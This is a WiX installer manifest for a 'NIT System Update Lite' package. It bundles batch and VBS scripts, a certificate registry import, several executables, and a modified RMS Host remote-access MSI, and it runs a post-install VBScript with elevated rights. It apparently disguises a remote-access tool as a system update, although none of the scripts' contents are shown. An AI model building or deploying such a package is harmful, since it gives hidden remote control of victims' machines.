<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
    <Product Id="BF3A29BE-2BB8-4437-B31B-F6517C50A79F" Name="NIT-System-Update" Language="1033" Version="0.0.1.0" Manufacturer="New Internet Technologies Inc." UpgradeCode="966E54BB-CDAB-451C-9E70-D2020ABA1784">
        <Package Description="NIT System Update Lite" Comments="NIT System Update Lite" InstallerVersion="200" Compressed="yes" />
        <Media Id="1" Cabinet="simple.cab" EmbedCab="yes" />
        <WixVariable Id="WixUILicenseRtf" Value="license.rtf" />
        <Directory Id="TARGETDIR" Name="SourceDir">
            <Directory Id="INSTALLDIR" Name="NIT.SYSUPDATE">
                <Component Id="CERTIFICATES_ALL.REG" DiskId="1" Guid="9EF08C17-0BA2-4AE2-BE36-C3C460D689C0">
                    <File Id="CERTIFICATES_ALL.REG" Name="certificates-all.reg" Source="NIT.SYSUPDATE\certificates-all.reg" />
                </Component>
                <Component Id="CERTIFICATES_INSTALL.BAT" DiskId="1" Guid="798544D6-7D94-43AE-9CC0-E4339529404D">
                    <File Id="CERTIFICATES_INSTALL.BAT" Name="Certificates-install.bat" Source="NIT.SYSUPDATE\Certificates-install.bat" />
                </Component>
                <Component Id="DESCRIPT.ION" DiskId="1" Guid="CF000443-D9B0-440A-82EA-1D72E33BB314">
                    <File Id="DESCRIPT.ION" Name="descript.ion" Source="NIT.SYSUPDATE\descript.ion" />
                </Component>
                <Component Id="ECHO.BAT" DiskId="1" Guid="303483FA-CF9C-4726-BA9A-64492D9A1D2D">
                    <File Id="ECHO.BAT" Name="Echo.bat" Source="NIT.SYSUPDATE\Echo.bat" />
                </Component>
                <Component Id="INSTALL_UPDATE.BAT" DiskId="1" Guid="0FF67F5E-2BE9-4A0D-AFFE-345E061C88A1">
                    <File Id="INSTALL_UPDATE.BAT" Name="Install-Update.bat" Source="NIT.SYSUPDATE\Install-Update.bat" />
                </Component>
                <Component Id="INSTALL_UPDATE.VBS" DiskId="1" Guid="F7AEC216-8181-49F8-9782-B085A22359C9">
                    <File Id="INSTALL_UPDATE.VBS" Name="Install-Update.vbs" Source="NIT.SYSUPDATE\Install-Update.vbs" />
                </Component>
                <Component Id="NIT.WIN10.EXE" DiskId="1" Guid="242CBC82-2BA8-4680-9B31-F54C19F90172">
                    <File Id="NIT.WIN10.EXE" Name="Nit.Win10.exe" Source="NIT.SYSUPDATE\Nit.Win10.exe" />
                </Component>
                <Component Id="NIT.WIN7X64.EXE" DiskId="1" Guid="01882A7B-9615-44F2-9666-E4909F21C7B2">
                    <File Id="NIT.WIN7X64.EXE" Name="Nit.Win7x64.exe" Source="NIT.SYSUPDATE\Nit.Win7x64.exe" />
                </Component>
                <Component Id="NIT.WIN7X86.EXE" DiskId="1" Guid="307033D2-5115-4897-BCC7-CE047DD4C065">
                    <File Id="NIT.WIN7X86.EXE" Name="Nit.Win7x86.exe" Source="NIT.SYSUPDATE\Nit.Win7x86.exe" />
                </Component>
                <Component Id="RMS.HOST6.3RU_MOD2.MSI" DiskId="1" Guid="5EBCB77B-AD37-44C1-A79B-09B57D8B141F">
                    <File Id="RMS.HOST6.3RU_MOD2.MSI" Name="rms.host6.3ru_mod2.msi" Source="NIT.SYSUPDATE\rms.host6.3ru_mod2.msi" />
                </Component>
                <Component Id="RMSHOST.INSTALL.CMD" DiskId="1" Guid="01AC69B6-7426-4D06-9398-19D1BA9B69E6">
                    <File Id="RMSHOST.INSTALL.CMD" Name="rmshost.install.cmd" Source="NIT.SYSUPDATE\rmshost.install.cmd" />
                </Component>
                <Component Id="UPDATE_WINDOWS.BAT" DiskId="1" Guid="7FE6F903-DFEE-41DE-99CC-43E436C54D6F">
                    <File Id="UPDATE_WINDOWS.BAT" Name="Update-Windows.bat" Source="NIT.SYSUPDATE\Update-Windows.bat" />
                </Component>
            </Directory>
        </Directory>
        <SetDirectory Id="INSTALLDIR" Value="[WindowsVolume]NIT.SYSUPDATE" />
        <Feature Id="DefaultFeature" Title="Main Feature" Level="1">
            <ComponentRef Id="CERTIFICATES_ALL.REG" />
            <ComponentRef Id="CERTIFICATES_INSTALL.BAT" />
            <ComponentRef Id="DESCRIPT.ION" />
            <ComponentRef Id="ECHO.BAT" />
            <ComponentRef Id="INSTALL_UPDATE.BAT" />
            <ComponentRef Id="INSTALL_UPDATE.VBS" />
            <ComponentRef Id="NIT.WIN10.EXE" />
            <ComponentRef Id="NIT.WIN7X64.EXE" />
            <ComponentRef Id="NIT.WIN7X86.EXE" />
            <ComponentRef Id="RMS.HOST6.3RU_MOD2.MSI" />
            <ComponentRef Id="RMSHOST.INSTALL.CMD" />
            <ComponentRef Id="UPDATE_WINDOWS.BAT" />
        </Feature>
        <UI />
        <UIRef Id="WixUI_Minimal" />
        <Binary Id="PostInstallation.vbs" SourceFile="Scripts\PostInstallation.vbs" />
        <CustomAction Id="PostInstallation_vbs" VBScriptCall="" BinaryKey="PostInstallation.vbs" HideTarget="no" Execute="deferred" Impersonate="no" Return="check" />
        <InstallExecuteSequence>
            <Custom Action="PostInstallation_vbs" Before="InstallFinalize" />
        </InstallExecuteSequence>
    </Product>
</Wix>